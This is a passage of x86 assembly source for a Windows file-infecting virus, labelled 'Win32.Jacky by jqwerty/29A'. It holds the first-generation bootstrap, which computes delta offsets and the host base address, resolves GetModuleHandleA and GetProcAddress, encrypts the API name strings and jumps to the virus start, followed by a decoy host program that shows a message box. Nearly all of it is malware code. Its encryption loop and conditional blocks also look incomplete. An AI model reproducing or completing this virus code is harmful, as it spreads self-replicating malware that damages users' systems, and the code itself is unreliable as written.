vszSetFileTime db 'SetFileTime' , 0
EndOfFunctionNames db 0
align 4
FindData WIN32_FIND_DATA ?
first_generation: ;this routine will be called only once from the first
;generation sample, it simply initializes some variables
;needed in the very first run.
push NULL
call GetModuleHandleA
test eax , eax
jz exit_host
xchg ecx , eax
call here
here: pop ebx
mov eax , ebx
sub eax , here - v_start
sub eax , ecx
neg eax
mov [ ebx + delta_host - here ], eax ;set delta host value
mov eax , ebx
sub eax , here - host
sub eax , ecx
neg eax
mov [ ebx + phost_start_rva - here ], eax ;set pointer to
;host's base adress
mov eax ,[ ebx + pfnGMH - here ]
.if word ptr [ eax ] = = 25FFh ; JMP [nnnnnnnn]
mov eax ,[ eax + 2 ]
sub eax , ecx
mov [ ebx + ddGetModuleHandleA - here ], eax ;set GetModuleHandleA
;RVA pointer
mov eax ,[ ebx + pfnGPA - here ]
.if word ptr [ eax ] = = 25FFh ; JMP [nnnnnnnn]
mov eax ,[ eax + 2 ]
sub eax , ecx
mov [ ebx + ddGetProcAddress - here ], eax ;set GetProcAddress
;RVA pointer
pushad ;encrypt unencrypted API namez and other
mov ecx , ve_string_size
lea esi ,[ ebx + ve_stringz - here ]
mov edi , esi
call crypt_back
jmp v_start ;ok, here we go.. jump to virus start..
crypt_back: ;encryption routine
not al
ror al , cl
loop crypt_back
pfnGMH dd offset GetModuleHandleA
pfnGPA dd offset GetProcAddress
;Host code starts here
extrn MessageBoxA : proc
extrn ExitProcess : proc
host: ;here begins the original host code
;Display Message box
push MB_OK
@ pushsz "(c) Win32.Jacky by jqwerty/29A"
@ pushsz "First generation sample"
push NULL
call MessageBoxA
;Exit host
push 0
call ExitProcess
end first_generation